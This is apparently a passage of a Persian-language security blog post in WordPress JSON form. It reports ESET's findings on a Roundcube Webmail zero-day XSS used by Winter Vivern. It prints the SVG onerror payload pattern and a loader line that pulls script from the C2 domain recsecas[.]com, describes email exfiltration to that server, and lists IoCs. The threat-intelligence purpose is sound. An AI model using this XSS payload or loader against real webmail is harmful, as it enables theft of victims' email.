data-settings=\"show\"><\/td>\n<td class=\"urvanov-syntax-highlighter-code\">\n<div class=\"crayon-pre\">\n<div id=\"urvanov-syntax-highlighter-653cef69cd5f2883353949-1\" class=\"crayon-line\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">svg <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;x&#8221;<\/span> <span class=\"crayon-v\">xmlns<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/www.w3.org\/2000\/svg&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">image <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;x&#8221;<\/span> <span class=\"crayon-v\">onerror<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;eval(atob(&#8216;&lt;base64-encoded payload&gt;&#8217;))&#8221;<\/span> <span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">svg<\/span><span 
class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><!-- [Format Time: 0.0002 seconds] --><\/p>\n<p>\u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0627\u06cc\u0646\u06a9\u0647\u060c \u0645\u0642\u062f\u0627\u0631 X \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc href \u0645\u0639\u062a\u0628\u0631 \u0646\u06cc\u0633\u062a\u060c \u0648\u06cc\u0698\u06af\u06cc onerror \u0627\u06cc\u0646 \u0634\u06cc \u0641\u0639\u0627\u0644 \u0645\u06cc\u0634\u0647. \u0628\u0627 \u062f\u06cc\u06a9\u062f \u06a9\u0631\u062f\u0646 \u067e\u06cc\u0644\u0648\u062f \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc onerror \u060c \u0645\u062d\u0642\u0642\u0627 \u0628\u0647 \u06a9\u062f \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0632\u06cc\u0631 \u0631\u0633\u06cc\u062f\u0646 \u06a9\u0647 \u062f\u0631 \u0645\u0631\u0648\u0631\u06af\u0631 \u0642\u0631\u0628\u0627\u0646\u06cc \u0648 \u062f\u0631 \u0632\u0645\u06cc\u0646\u0647 \u06cc Roundcube session \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 :<\/p>\n<p><!-- Urvanov Syntax Highlighter v2.8.34 --><\/p>\n<div id=\"urvanov-syntax-highlighter-653cef69cd60b173206311\" class=\"urvanov-syntax-highlighter-syntax crayon-theme-bncplusplus urvanov-syntax-highlighter-font-tahoma urvanov-syntax-highlighter-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"urvanov-syntax-highlighter-plain-wrap\"><textarea class=\"urvanov-syntax-highlighter-plain print-no\" readonly=\"readonly\" wrap=\"soft\" data-settings=\"dblclick\">&lt;br \/&gt;<br \/>\nvar fe=document.createElement(&#8216;script&#8217;);fe.src=&#8221;https:\/\/recsecas[.]com\/controlserver\/checkupdate.js&#8221;;document.body.appendChild(fe);<\/textarea><\/div>\n<div class=\"urvanov-syntax-highlighter-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"urvanov-syntax-highlighter-row\">\n<td class=\"crayon-nums \" data-settings=\"show\"><\/td>\n<td 
class=\"urvanov-syntax-highlighter-code\">\n<div class=\"crayon-pre\">\n<div id=\"urvanov-syntax-highlighter-653cef69cd60b173206311-1\" class=\"crayon-line\"><span class=\"crayon-t\">var<\/span> <span class=\"crayon-v\">fe<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;script&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">fe<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e \">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;https:\/\/recsecas[.]com\/controlserver\/checkupdate.js&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fe<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><!-- [Format Time: 0.0011 seconds] --><\/p>\n<p>\u0645\u062d\u0642\u0642\u0627 \u0645\u062a\u0648\u062c\u0647 \u0634\u062f\u0646 \u06a9\u0647 \u0627\u06cc\u0646 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0631\u0648\u06cc \u06cc\u0647 \u0646\u0645\u0648\u0646\u0647 \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 \u06a9\u0627\u0631 \u0645\u06cc\u06a9\u0646\u0647\u060c \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647 \u0641\u0647\u0645\u06cc\u062f\u0646 \u06a9\u0647 \u0628\u0627 \u06cc\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0632\u06cc\u0631\u0648\u062f\u06cc \u0645\u0648\u0627\u062c\u0647 \u0647\u0633\u062a\u0646. 
\u0627\u06cc\u0646 \u0632\u06cc\u0631\u0648\u062f\u06cc \u062f\u0631 <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/blob\/7b2df52ede57bab9e87e9c3bc00601eeca591a5e\/program\/lib\/Roundcube\/rcube_washtml.php\" target=\"_blank\" rel=\"noopener\">rcube_washtml.php<\/a> \u0647\u0633\u062a\u0634 \u06a9\u0647 \u0628\u062f\u0631\u0633\u062a\u06cc \u0639\u0645\u0644 \u067e\u0627\u06a9\u0633\u0627\u0632\u06cc (sanitize) \u0631\u0648 \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u062f\u0647.<\/p>\n<p>\u067e\u0633 \u0628\u0637\u0648\u0631 \u06a9\u0644\u06cc \u0645\u0647\u0627\u062c\u0645 \u0628\u0627 \u0633\u0627\u062e\u062a\u0646 \u06cc\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0645\u062e\u0631\u0628 \u0648 \u0627\u0631\u0633\u0627\u0644 \u0627\u0648\u0646 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0647\u0631 \u06a9\u062f \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0648 \u062f\u0631 \u0645\u0631\u0648\u0631\u06af\u0631 \u0642\u0631\u0628\u0627\u0646\u06cc \u0627\u062c\u0631\u0627 \u06a9\u0646\u0647. 
\u062a\u0646\u0647\u0627 \u062a\u0639\u0627\u0645\u0644\u06cc \u06a9\u0647 \u0642\u0631\u0628\u0627\u0646\u06cc \u0628\u0627\u06cc\u062f \u0627\u0646\u062c\u0627\u0645 \u0628\u062f\u0647 \u0627\u06cc\u0646\u0647 \u06a9\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0631\u0648 \u0628\u0627\u0632 \u06a9\u0646\u0647.<\/p>\n<p>\u062f\u0631 \u0645\u0631\u062d\u0644\u0647 \u062f\u0648\u0645 \u062d\u0645\u0644\u0647 \u060c \u06cc\u0647 \u0644\u0648\u062f\u0631 \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0633\u0627\u062f\u0647 \u0628\u0646\u0627\u0645 checkupdate.js \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647: (\u0641\u0627\u06cc\u0644\u0634 \u0631\u0648 \u0645\u06cc\u062a\u0648\u0646\u06cc\u062f \u0627\u0632 <a href=\"https:\/\/github.com\/onhexgroup\/Malware-Sample\/tree\/main#wintervivern---checkupdatejs\" target=\"_blank\" rel=\"noopener\">\u06af\u06cc\u062a\u0647\u0627\u0628\u0645\u0648\u0646<\/a> \u062f\u0627\u0646\u0644\u0648\u062f \u06a9\u0646\u06cc\u062f)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4954\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-3.webp\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-3.webp 819w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-12.webp 300w, 
https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-13.webp 768w\" alt=\"\u0644\u0648\u062f\u0631 checkupdate.js\" width=\"819\" height=\"271\" data-dominant-color=\"f0f1f2\" data-has-transparency=\"false\" title=\"\"><\/p>\n<p>\u067e\u06cc\u0644\u0648\u062f \u0646\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u062f\u0631 \u0634\u06a9\u0644 \u0632\u06cc\u0631 \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u06a9\u0646\u06cc\u062f\u060c \u0645\u06cc\u062a\u0648\u0646\u0647 \u0627\u06cc\u0645\u06cc\u0644\u0647\u0627 \u0648 \u0641\u0648\u0644\u062f\u0631\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0627\u06a9\u0627\u0646\u062a \u0641\u0639\u0644\u06cc Roundcube \u0631\u0648 \u0644\u06cc\u0633\u062a \u06a9\u0646\u0647 \u0648 \u067e\u06cc\u0627\u0645\u0647\u0627\u06cc \u0627\u06cc\u0645\u06cc\u0644 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0634\u062f\u0647 \u0631\u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 HTTP \u0628\u0647 \u0633\u0631\u0648\u0631 C2 \u06a9\u0647 \u0622\u062f\u0631\u0633\u0634 <code>https:\/\/recsecas[.]com\/controlserver\/saveMessage<\/code> \u0647\u0633\u062a\u060c \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u0647.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4955\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-4.webp\" sizes=\"auto, (max-width: 1108px) 100vw, 1108px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-4.webp 1108w, 
https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-14.webp 300w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-15.webp 1024w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-16.webp 768w\" alt=\"\u067e\u06cc\u0644\u0648\u062f \u0646\u0647\u0627\u06cc\u06cc\" width=\"1108\" height=\"648\" data-dominant-color=\"f4f4f6\" data-has-transparency=\"false\" title=\"\"><\/p>\n<h2>IoC\u0647\u0627\u06cc \u06af\u0632\u0627\u0631\u0634 :<\/h2>\n<p>\u0641\u0627\u06cc\u0644\u0647\u0627 :<\/p>\n<div class=\"table-container\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td><strong>SHA-1<\/strong><\/td>\n<td><strong>Filename<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>97ED594EF2B5755F0549C6C5758377C0B87CFAE0<\/td>\n<td>checkupdate.js<\/td>\n<td dir=\"ltr\">JavaScript loader.<\/td>\n<\/tr>\n<tr>\n<td>8BF7FCC70F6CE032217D9210EF30314DDD6B8135<\/td>\n<td>N\/A<\/td>\n<td dir=\"ltr\">JavaScript\u00a0payload\u00a0exfiltrating emails in Roundcube.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>\u0634\u0628\u06a9\u0647<\/p>\n<div class=\"table-container\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td><strong>IP<\/strong><\/td>\n<td><strong>Domain<\/strong><\/td>\n<td><strong>Hosting provider<\/strong><\/td>\n<td><strong>First seen<\/strong><\/td>\n<td><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\n<p dir=\"ltr\">38.180.76[.]31<\/p>\n<\/td>\n<td>recsecas[.]com<\/td>\n<td>M247 Europe 
SRL<\/td>\n<td>2023-09-28<\/td>\n<td>C&amp;C server<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>\u0622\u062f\u0631\u0633 \u0627\u06cc\u0645\u06cc\u0644 :<\/p>\n<p>team.managment@outlook[.]com<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0632\u0645\u0627\u0646 \u0645\u0637\u0627\u0644\u0639\u0647: 4 \u062f\u0642\u06cc\u0642\u0647 \u0645\u062d\u0642\u0642\u0627\u06cc ESET \u06cc\u0647 \u06af\u0632\u0627\u0631\u0634\u06cc \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0646 \u062f\u0631 \u062e\u0635\u0648\u0635 \u06cc\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0632\u06cc\u0631\u0648\u062f\u06cc XSS \u062f\u0631 Roundcube Webmail \u06a9\u0647 \u0627\u062e\u06cc\u0631\u0627 \u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc \u0631\u0648\u0633\u06cc Winter Vivern \u0628\u0627\u0647\u0627\u0634 \u0646\u0647\u0627\u062f\u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u0648 \u06cc\u0647 \u0627\u062a\u0627\u0642 \u0641\u06a9\u0631 \u062f\u0631 \u0627\u0631\u0648\u067e\u0627 \u0631\u0648 \u0647\u06a9 \u06a9\u0631\u062f\u0646. 
\u062c\u062f\u0648\u0644 \u0632\u0645\u0627\u0646\u06cc \u0627\u0641\u0634\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc : 12 \u0627\u06a9\u062a\u0628\u0631 2023 : \u0645\u062d\u0642\u0642\u0627\u06cc ESET \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0628\u0647 &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,28,29,34],"tags":[],"class_list":["post-50682","post","type-post","status-publish","format-standard","hentry","category-vulnerability","category-28","category-29","category-server"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50682","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50682"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50682\/revisions"}],"predecessor-version":[{"id":50758,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50682\/revisions\/50758"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50682"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50682"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50682"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}